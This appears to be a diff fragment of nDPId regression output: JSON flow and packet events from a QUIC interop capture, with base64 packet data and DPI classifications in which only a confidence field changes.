00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02156{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApCJAAEARDmPAqAGAjOM0XK5LEVEE7HYoyAoKCgoIlk3\/sw8\/b8wAAETStyAajltT68+ELYCklsRAAPKAhQKMXFJKXjIBWFRGvhiDbyM2RmA52mTO4kP\/LrjWRFOsZXPJwPYxhAgmyxVp2EaKhvInx5Lw6HoctLCI997uZ1ErbFrvVx2kMNsPbvf0c3KMKg04dEw3CGmIj1nwwAV3TplnDlLA8nGhigvTtzDcOYuThyFe7PNCKGoMhnIJglojVVIsBdMJYdSb90I\/+fQVaZ\/MIgmBIoSGWUE5ZAGntmDgtp0dgmx\/\/p7O+2ApCOoZi2+ZG1i32q4n752EIFh9R1W9\/09HXsuHjyhRiyoUZgqfvLkrSOvdv2ZApV3VMcrOD182D\/IFqwmSJhEKqa3Gz0XQ7x1AhDvKB\/98pdfLJuGPyAwXeMf3RbsjoJ7UbwIjIEtg2aJPV4zFaASkuBedOA0xRnIgegCv4bmWgElYnQC3X2r85hddZMtDhxN4hidUWYN\/uvDzyKGj38LAsQE2LOY\/U4yjUes\/A4X3Db4RMeoGGuaTPx8vHEhWcAZIkak3bdmdfUCKhTRw1Sobn\/0WZO3JeU\/O3LN6aaFNpd44oi+fv1YoqhJLtxNGYHj6lTz\/xWvwh\/5OpWupvnaRJw140wePCUI03nAaDAbvdgZhJxJUM9Ez2imcu\/DPUQxAcI87gwO9rHzyEFTZvBE2fYXUdWQ\/lBLvDIIIlbqrIBwZN4Rm1K7rJEsqaSGAetVKqYqrotg3G0Xv61dakHj\/9j5SGgi\/fc4wYQ4pRjWW7gItXzVqCglacLb3JoibdGgtA9WYGsZizewIUhH3c6imISZ6jCjLrzmXYytkHa2NT60DFmqp\/vbUzMpbFIHZoMMMlZrZErLgQqwcQrIy3BrvnbjZx8ZBklzbGPAwWqCy+HTuUfRLftp\/kFiVk1D\/72KMbyr6s7Bkxhgo4bI7zvMOHUidZ2hdC7UGsUUF\/x5smJeYW4wNdHD5iv58qpr6HaH2Rdza4ULK\/pyl75oX9CDKuX6jrGDlbgHOykS1bvJCTRfYwBjtGXraF58jEQVZJJ6HImPxPLTVvhi1weX0G57pwdQK\/6eBVH95xHZHTJaU4Kw3RS3xIWdjP6LitM0DZwW6TtS3P2G33o2Wkp7Fc9Y1dXTKUMs0nCmH9d7CCnjVWLYi1dhtz+Tta6lf48tU\/Qqf+zHItaHY7LtapxEIIsNEmVNQuXDZMbBZtU9UWcCYPTIXOZsOuWi+KlnlEVjhzxN\/kL7Rx56YZNVto9cOmH\/bByewHjhP8N44u7cip7U0HR+jmMmuxSSFw8RHPveSA9s0JovEVcJmQ19M5ynV7yxMWdfjeOMYtsTVM0tONAfzs92B1HE+34bwQSIOaG8X7No01hV+V\/yj+dryeODPmr1LKIAJ\/MbgypzFmTw29gDvyUBXq+ZwqdS3iCKSfowPes0BSJPSzSUi4Z4dIaBSLQpt9PNBOgH0m+JbP5PlkMRT2nmJjGR3PzvdWiWmCFTAb5JDoyjuyFHdi3lWKONx+lFmzZJwxs+UMErRJBVTz8V6tf9wiTJCTFmYGF4UgB\/CTJx3DI6wbo9X53d0S0QTy3dGXJZO\/H8qOsGI8aNw1qzLXLU6KpohKtMy7TWM8yk8onvWWarA524pLpTHLJknBb\/q73gznwGfXGsA9dvY+vw8XuLELA=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1603816434674,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434674,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAc6RAAEARGHTAqAGAKHC\/PLXwEVEE7EM\/ywoKCgoIUh1YuhDqcyAAAETSyJu8rPDcY2Zmg9uhZvVGBSUtVHXbCogcrtjHkIZvyHG+oeQ7FMn5l9+yu4riTWt9G4+IRLvodWF\/OJuoo6CqqAN5qJoCM2wclVmCRhZ0yQpnR39UyeNNZNj55s0biH2qmAqdK7slUkz7cGbucaEPgYcjaZ1qoQwZ3r+tJVP2\/OosjKKgI3ssy6b8rBby+2gKA6tqrWlo4j913jt0V5Myxk6\/qG4m7XLGNhI+nqBnhUE9EJwSRwQbLcrG1YPxrCPYFKhaONrMEZrfUQUokRl+FtZYxnK7kRHiDzvfmlVCIPnCHsK+5SDQIbVAkCmMUWxjZ3bcH0rMAJZjsUd13Mp827NwaPY1eDE4xURESo0uH3LaTB+cGxcmZiI1vjnmW5fkVYKNgRSg0LQtDAGzCxaf9M30heOBY4ij6gT6HUWwVg+\/JFFdRax7wIj+qnGHaTs+tirGGEnbomoy1juUgYZn3ol7W9gFpvOFFGfsT9glqttgJXgMLwaC66I5aigEznfj7F8whFTNHLDojz+A60t6JiMTNVJkEgkdgm3rvpiMCW15t6bApORRa5kVOHruRwVYI10UY7IsHOtU6782GbDZSpGr8ntN8sySw6dOku3uT76aTNaaNtW\/2\/SmZ6WiPXDUGFDezYRwnESar9Jps0+5gYGAogq9ycMTf2y0dC4uoffSPWz1EdfmGrYbBIJCM9xuPdTrwpA6ThIjDDFV\/a6MJaOn5xQl6aMEUqPMHj458lJHEgyVojPxewoZCn1jkXsVl3BshvNc40UloZP\/zq2QIIDXt8Fodu3I71j4TQet+ImZTuvbDliPLbMm\/UuGwX7wyxtGWarNp2rii5+q0UaxBVtO8\/oJYF0+p44Z\/6vIrPBqNKbPEzkHUHiQQ9awnKGtngmRd0EnWA1J1Y87Abt4Qy51cs2KvlQ8aNSkmdJNosK8Lplp4c9AiloRm+Wlx6dF2sPcBXzpXCJ1Zlb\/eS7cm+1Of3sizAGLukg4XoSb8ue\/DVtfTnqnMgdaKnjOTE4lwUDNk1dzsHxmIBEdGAbUpr+sz2h7ZiHbtdfQRMC8R65ogyaeDK4C1lsoJ7uCJnAWZYyCp2BgnCpvONxxWtaYB6uz0UzVRleBEeiLenAlMfVHpx4w4aBWlyfvuTuObpJLNHDWzAbZSgjHkN3ZYnwTzsuPAriOrYPf6ATtgw+ny2XHg\/qI3joZ2eO+lgJd87BsLnTQUd07WAQILuYO6jQ9vvkRRzosU72uqVr9x1lpfayG4CEyt0LUHBSmhuPmLena56\/to8FPfnyS9lNyeUIAaI4Fe4R3\/cEHg8NHDOKfjqOhNoajIZ8hm564A0lQ7hQTdBfGSgEwYSiDVP6eZcG+q0lw0017Nrj5WZoVrDtJB2VmZc8vjaptwWTVWvSIds8zNI205cr+tldoXLWshLEkoE0W0QepIpcvJTYL76KEZPhOvEWN08HQuMtxYugoC0qCkSsgCEXMCRpKiTlmRwjkQSmHvPZvjNte3BsWsO0fzr7S19GB7OyjGnnDBaF02DOLob0KkURE8IUAwhzi50lzUy41R1QjTFR94lQA9n5SPLtvlqTYWDXlIlyHzlvKnztl7SJtU\/J2mGtnwVygn3oE2zBGLJfYgi3ZH3hoCHuyTU70yw=="} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1603816434677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434677,"pkt":"PKn0qB\/spJGxgjQ5ht1gBwV2ACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9EVLMLwArOxiAAAAAAAAIjowvkCXlc11FR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="} 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1603816434677,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434677,"pkt":"pJGxgjQ5PKn0qB\/sht1gDEm8BNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABrNMRUgTYSrXMCgoKCgj2S26kHUj2aQAARL4Oqb7kxp8VwqfBhPdfdtQhtwUXSB8\/M16zqaKTaiM4uFSCgiApTua+W3aFO11E8\/vpjw5fdiBSABUTDotMg5RkiQr0MSpUaARnrP0PNMBaoZi0T3torsgUpfH8Z7GKLvwTGd3hbCPXQz5HEzUHjJnObkXYOU8pDBMRAGZYnp5rkZbRT2vPBVCj8Cvx8bBBKneUgl1FG4uQ4EwyOma55O1RYgmn2Ynf1Ko5xhvyQTnOGQ+R1VyW0n7heo02IMCfY4VWPj\/QJHyKTPMBIDBtSvz3J6mf3nv69QC6K+3y7kTFVD4RNSmXPDKfJ4r8a\/jVYQ3tiwvsysKnCLgA5zby1+dfPHEiaiwawfH+cKDMssE48zXk1+MDRnahgP5\/5W7h5R0W7WQX3skNYTREacQ3LvDACn58ERfFzl2AshIb29QMiGQj+aXYqT7ftIu1mYCEtR10HqM0E0tdjMJlVoxU1sQCMNHCcSjur932nDLMq95bmJ\/epzRqKtYXqFfJm4ZnhGTZV2QZB+hX7pNkAbrVOicdWh6ASPsIKRVzbgM4azW3TFLOWbFSWksd82BdcgW3kBeZ+Zy87igudzpPx0kdISA+wUJUrSUaJmejNXcUK68sicz01uq+5FBxl7uzJB5i2OXGU+jvmL+lkKweCPtvayVLhcuvz7KLW1nrXu3HU\/E\/bgsaTJyGVokl31OFOSR9LQtdKuoewFPyn5r490C8zNMeXqpImt2kn4Tr\/jlH\/fxzyim4MX4msP404e3jLfo+J9lzJhkenDu9xAnUgd\/iKSb6RgtGPU4Y6NI2QNpIfd6MzugcP8a0lodftPQcResoW35Hgg5t6I+PqN5frd2jtB5RiFyFN6yYVSH5fwqpb5sgLyM2ZMvumoV6ZVCMO3EMaRJu6f+U3CDduLYbXqPjXTUFXnzx9Vt03+YreNFX6wa5PrrBlSKMZP\/2WAmhb8cWINvyoZmFlnI2qd6sXg1dpFNY99Vqu1GrXPgV8Qi9MxV9uHzluuqG5swDMVT91S3LeU6XPmicYuwxrVZ0fDoeWpn4Kta0sEVDVUOf9hI8REFrn\/lLtMViNZ5rtWhIMKLyMIne37ob1RynB8J3PHqTTUqyQWLUmsA7XpXuycyFg0eDsVEBgiX65miUosWBtlhptbWoDODs0zqjlEGqOg5rKyio59+SI+p7jTV93mdfy9Wt2QGrnsPSiOSsj\/pqM\/pZ2PPrcgdTK9VPceK3CdsRz\/jNTpieviefPJXgnQD9JDKvgbRzI7jy8hldn4q+BSAvi3W0FwGFIYHJsgwTS2D+M4jyoohPca8fHwPwrKPUAytl3yLskOFTcOEOwWAP0YkHc8DSZIYnWDfZRitncpUl9qEcnjpTihvHHfw2HQxFR5lkMlUwBOL06kpNLUObIMz0gJ8az8O5U2MJseOwsScI7UtAgMA1Wat1Jr7S5b3fSl1DVUzvG0hnyrSZS2C54u89rSG8QQybBKCeSDnq1GpKeq\/O7HdjP04WmFuLDA\/vf\/9lSaOXhNpEErLndSFsHzNaPYP8EGwGI4iaWZOfcrm8FyutSUmLAlYtemRojNwXfa2nJlp8muaoRnKD2oN1ySI11a6rSv0gyOvlVRJ5egXWtg=="} -01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00649{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1603816434678,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434678,"pkt":"pJGxgjQ5PKn0qB\/sht1gAjrXBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPlfoRUQTYrGTHCgoKCghDKzGtBgOvzAAARL61MEV7YMQkWdmZghiuiQz1o5QNdpzYuutf\/wdJhEZL1cudV76JEdjtP0Y3OyHIvIbsmMmNX4mYnmIsf1njial3e905frw0uHyw4\/f+5H0ef2WAdacdKOP40DoDeuCFxQz4bIKDgm8hBJ7vkD1IMm7AaEpvUQhSLgN8f+x+sA9RH+TmObL9fghOs+eNxWf96HoP4pMWR3XqHFfSqIk5FX3TNVvr+riiEz6IuctzVwm\/zqWSmC9dmXci8Fui7Q8OxkH6gLCU+aYM9wrrVZJ9j5ya5VCMnDAttNuuPdq5z4cDdXloIyyGypYPGlULxwG65oqg8RxhEo29up9ffJVpEaQX8UGyxOt3ZFGPweILYH6rNyUpje\/uB9d\/2Tqi9fZfaLpagN9mrVHJYMlLvkjpSaeasCrG6FDs+Nh7j2i5xAxuAkQ0xK7QS1Hlggg20h5t9cMg6O780ayQOD4SQCU+0AR1BtVV6iTy8Q0dm9tIpKWeNO7CSURoIrvTXKHBx5OXHuDteNJNabHxEW6\/e\/OGRw8IMWO65lgJPUK\/p\/99LM38gOa9gV2dzOdfDcRMvpSWbp3E44GpcUzlsSO+wF7JBY6P9esQ3iafS\/xZ5rdGYm06lyYTCDffm6X4KxkSuGJfTJKvPfMGPtO7M1PMG\/4y9kmbFwotO70O3qzn76AeIsqparz4gqE2VEl8QpfdxQliRyqZUZsoWB5UziEcGYDOQAbZw0c82QzSgLib58kPXBug4vmPNM71D9PmG+ZxduAFDFdu7EkUfNSxMfR6hOQumdYRVQ+J+QuJvYZ4r8AlRlJcX6HQpLdQXTOStQMDY7ErsX3+lkhbFCkOUvVD1zPSZ3X9i\/Jl3XL5dbrTO0oYnJiNAJHokvd9x91UJlo5E9+m85+BWm+iMzm3+6bNRAaSQKQrjdjennHLWo7GXNi4AtuurC53Pep+V5GsYHEa33KdpNHgca7X0HexhNHc2ElVJlmKiO9osCGww9ceX9y1pVU1v4UF5cspUvQ5RkcxirKgmOqDN1dbnXmgpQwLWcEgtJk0m+iyn9xNTJhEsJCf4M2GThouE0XLF3rBbGR8AaMV8IgL1g4CrqnSeTXeC0TiPef5r0N5Ew0ni6DodVZqUqNOv+QdCVcZaIWofYvBzMdvqE6zhO4AzOTz4GAPej5UV34aUDRCl13vR0NWFf5GvaZquOIg2EYE\/YyJl2nILl86w\/YT7aCfJJltdrHwSxGGAm2JodfqLx42fCKG98UlucLIjp39SZj8UGSr\/xymfE+UQrmVP\/eIDKUfQ\/F9RzSEtE4Gywjiw+VYseozSQwwkW8vYlep8AwdQshSEv4BOVgTV1jTbJ7jHDu3x3W7Ka2SYTSb3Yt+KkdDWxpTmyTJioeUboa1C8BSpZMyhJwlf1bmECMTVdLKtJOVuXslMtlUCVIAqqT9OTre4ouFYJNjliLNU9F808vVjFTZqlwwQjwIeKMK9tlRJNZxnWX+u5Tmaz0QgLbCP6pKnk6GGff9hBXEoVtopyfSJnogk4UBU3qLzTqqNWTse2gikbJRX2feLSYh9ICdhs0jcaXO512YMcM3tN6524plEU+japLcwChj4baYrOQTz7NVY1HU6hrUlA=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1603816434679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434679,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUArn9AAEARHfrAqAGAyu7cXJXeEVEE7GpTygoKCgoIN5KvB9nft6kAAETSd859O5gTcUYdl0d8aIlRj3zx4AjuKGa4ASMymO7vXZjT6sVM6pCw7HvmCO7cFlITvmBGM4kZgYz2DWfjjS2UhT8z6S+u4ZuqQnP6sPmHL0WtgrbFimoDsZXEWh5x4WsY15wAJFswtYDmxQkwEBAjgyKuyRv6VywYakyk9BNgIHVKy7BfjK1rPoWZ5w5I2hl2yWFdZ1\/dE9wNP5q3XxjhqAOQa4bzoBKefCRP60vRescDr5A1q9Gh9rEI1UxmIZexsLIorUS6jw27c7X3IRHEFYnp7damMbgudCUNTZ0D5\/x2EYQKzoV23CePPHf7CWo9eYf6XRWEJIBGs5xS8ziNV5+H6hYANEPNNnvMqWmg1CtTp6rU+5R3i7\/FA2u3qMYhl9YXtwck1Tx2THWWJnPTlV31JToDh9hcEx6ePHf\/HDVkBKTcysw+7WUh4g1S4U\/E6GwOzJUSl1j4FyQSA72MFR1nukBmK5l3E7lnPPMHE0UwlBbgRRjJIWWWMjukOyYVX7HOM8mWhaZJs8eEj1aINh\/eg4bAf1JY\/ufLTloR31S7y6OReDYCA\/J8a\/ZHMCpyo\/cgCYZnXroSqO5eUMiOd6mWZMV3WlojmNGGqUwidDXDOOAZnauH05acuiWNjN1drZ9uLl7kCD3klbBaB69xmhwOXqhlY+ov6Mo3v8dkwR3EXQE3Cj\/lQ4KJ2OrXiOlAmz\/GweVF9wuMVbg+hyvL7DdfTfw2qYLKgSNqwlGvO5T2f1lglyHLXCucOL7n\/zNjX0\/xlVOCxhUkQhgX\/XGJbbA7qxh9UXxvdZ3egx7Bshhqr1n6BUMoFOpjvUuGdgO0OjUEdRk5Gyk2HkFljHDaGm4ht4bH9hDtZ6HYm7nqyUay+Gd+WMBexYGDLQ2kaYG8GnHD4PrlcFbEvk3ju9rGX1R2QtLYbACEJdNJ\/zEc2GzZDjRz1o1gvI2iG\/x96iCGyzUz1N\/+nAKV+q5s2K22NkRxb1jIgd\/41FenkfbgFmpz0CA\/DQCyiLHlX2lw10drz3XG0f8LJfTp2vzPq\/+gH2c2gRSj2YcaBCyDTY5AKtyDkOEZKSL3C2C8JmYr4iJS8RMpB0jL35JgLPvSFgcoNymNWAjCjfeRN9n7RfdzVEX72bqAPdPKtdKHRkZOWGqcrp9n5GGjnQWG\/Jwx6RR+qXT6KecYDU2tCsKg\/XBFBnLfBCe2RP1K2zPx4D0wUdqR6tPZpisKmvW9Y3UI2tmUo9tLMaYgnRgRJ8M4\/14reEvtbK2a7xa1D+9b4yQoAoVStwjeuCruASzB76vQ7Oikq\/y28NWNAE6l7JAxtLpbUGRtWL7EwfR3329LDfnglJf6znmUiNxo5AmhhQH2+XGsnwv7e2QwJKwUtxfbSP6qjjAq\/IHu8Ph2sxgzDmxzqJS6NBD5\/rREJkwIRDPsPQN1aQTeYN2N94Pv5crstjdG+7f9DC85NWJZAJRxBLehoQTlbi\/SnUmr9i8puHfTCKc8NDOGVlMiWSfVcSKswlSyz9AjvXr\/Y+TehMUjsxQeL0lUqcIXfqPcJlum33ICV492562h19036aZai6yQ0yHgw3hE7aGMjyObE+Uh9o51GqJfXzYJ\/J3E7ReivOwkmjMio6pMVZIlFMAmLX7M2ggGLe5cHg=="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1603816434680,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1603816434680,"pkt":"PKn0qB\/spJGxgjQ5ht1gAQBvAB8RNSABC8hHpBwlAAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9EVLAdgAfFkT+AAAAAAAIs6FDVD5jbx4KGio6\/wAAHQ=="} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434680,"flow_last_seen":1603816434680,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434680,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 